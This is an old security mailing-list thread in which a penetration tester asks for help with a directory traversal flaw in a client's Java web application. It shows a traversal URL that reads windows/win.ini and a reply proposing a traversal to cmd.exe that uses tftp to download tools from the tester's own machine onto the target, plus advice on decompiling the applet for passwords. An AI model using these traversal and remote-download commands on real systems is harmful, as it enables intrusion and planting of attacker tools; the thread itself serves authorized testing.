Re: Directory Transversal - safe_path(char *path) function

[jfvanmeter () comcast net]

hello everyone, can someone point me in the direction on how to or if it possible to verify thae safe_path(char *path) 
function in java? or in a java .class file? 

Thanks
Take Care and Have Fun --John

 -------------- Original message ----------------------
From: "Zed Qyves" <zqyves.spamtrap () gmail com>
> Hello John,
>
> The "code" snippet is indeed responsible for updating the java version
> on the CLIENT side of the application, best guess is that you are
> downloading and running an applet that takes care of all the
> communication with the 'web server" component of the application. Is
> the applet part of your scope or just the server side compoenent (I
> would guess both are but...).
>
> If yes there are several things you can do with the client side of the app:
> 1. Try putting that through a java decompiler and see what tis
> happening behind the scenes. you could be geting all shorts of info
> from the source, comments / hidden debug statements / passwords and
> the such.
>
> 2. Have a look at the beanshel, useful to change runtime behaviour...
>
> 3. Put it through Java Object Inspector
> (http://www.csnc.ch/static/download/tools/objectinspector-1.0.zip)
>
> Have fun,
> ./ZQ
>
> On 10/22/07, jfvanmeter () comcast net <jfvanmeter () comcast net> wrote:
> > I want to thank everyone for the help, my client has ask me to continue 
> working on this problem to see what else might happen.
> > Here is alittle more information about application that is web enabled.
> >
> > Its running under java, and check to see if java 1.5 is installed, and if its 
> not it phones home to SUN, and prompts you to download 1.5.
> > Could these line be causing the problem?
> >
> > if (_ie == true) document.writeln('<OBJECT 
> classid="clsid:8AD9C840-044E-11D1-B3E9-00805F499D93" WIDTH = "900" HEIGHT = 
> "600" ALIGN = "baseline" VSPACE = "0" HSPACE = "0" 
> codebase="http://java.sun.com/update/1.5.0/jinstall-1_5_0-windows-i586.cab#Versi
> on=1,5,0,0"><NO EMBED><XMP>');
> > else if (_ns == true && _ns6 == false) document.writeln('<EMBED 
> type="application/x-java-applet;version=1.5" WIDTH = "900" HEIGHT = "600" ALIGN 
> = "baseline" VSPACE = "0" HSPACE = "0" CODE = "KeyInfoApplet.class" CODEBASE = 
> "" scriptable=false 
> pluginspage="http://java.sun.com/products/plugin/1.5/plugin-install.html";><NO 
> EMBED><XMP>');
> > //--></SCRIPT>
> >
> >  -------------- Original message ----------------------
> > From: pand0ra <pand0ra.usa () gmail com>
> > > God is this an old exploit. Dogbert needs to come in and beat someone
> > > with the stick of stupidity. Rant over, here is what I have done in
> > > the past. I just setup a tftp server on my end and call tftp through
> > > the URL and download whatever tools I want on that system. I haven't
> > > done it in a while so I am a little rusty on the exact syntax.
> > >
> > > http://mycomputer:port#/..//..//..//..//..//..//..//windows/cmd.exe?tftp
> > >
> > > On 10/17/07, jfvanmeter () comcast net <jfvanmeter () comcast net> wrote:
> > > >  Hello everyone, I'm in the middle of a test on a app that the following
> > > command works on
> > > > http://mycomputer:port#/..//..//..//..//..//..//..//windows/win.ini
> > > > and it will prompt me to save the file, if i check my packet capture I see 
> the
> > > contents of the file.
> > > > So far I've been unable to get a put or post command to work and was 
> hoping to
> > > get some ideas from you all on things to try.
> > > > I've been trying to get nc/telnet and some other tools to help me with the 
> put
> > > comand
> > > > Thanks in advance --John
> > > >
> > > > ------------------------------------------------------------------------
> > > > This list is sponsored by: Cenzic
> > > >
> > > > Need to secure your web apps NOW?
> > > > Cenzic finds more, "real" vulnerabilities fast.
> > > > Click to try it, buy it or download a solution FREE today!
> > > >
> > > > http://www.cenzic.com/downloads
> > > > ------------------------------------------------------------------------
> > >
> > > ------------------------------------------------------------------------
> > > This list is sponsored by: Cenzic
> > >
> > > Need to secure your web apps NOW?
> > > Cenzic finds more, "real" vulnerabilities fast.
> > > Click to try it, buy it or download a solution FREE today!
> > >
> > > http://www.cenzic.com/downloads
> > > ------------------------------------------------------------------------
> >
> >
> > ------------------------------------------------------------------------
> > This list is sponsored by: Cenzic
> >
> > Need to secure your web apps NOW?
> > Cenzic finds more, "real" vulnerabilities fast.
> > Click to try it, buy it or download a solution FREE today!
> >
> > http://www.cenzic.com/downloads
> > ------------------------------------------------------------------------
>
>
> -- 
> ---------------------------------------------------------------------
> Κρέων
> ἐν τῇδ᾽ ἔφασκε γῇ· τὸ δὲ ζητούμενον
> ἁλωτόν, ἐκφεύγειν δὲ τἀμελούμενον.
> Οιδίπους Τύρρανος [110]
> ---------------------------------------------------------------------
> Creon
> In this our land, so said he, those who seek  Shall find; unsought, we
> lose it utterly.
> Oedipus Rex [110]
> ---------------------------------------------------------------------


------------------------------------------------------------------------
This list is sponsored by: Cenzic

Need to secure your web apps NOW?
Cenzic finds more, "real" vulnerabilities fast.
Click to try it, buy it or download a solution FREE today!

http://www.cenzic.com/downloads
------------------------------------------------------------------------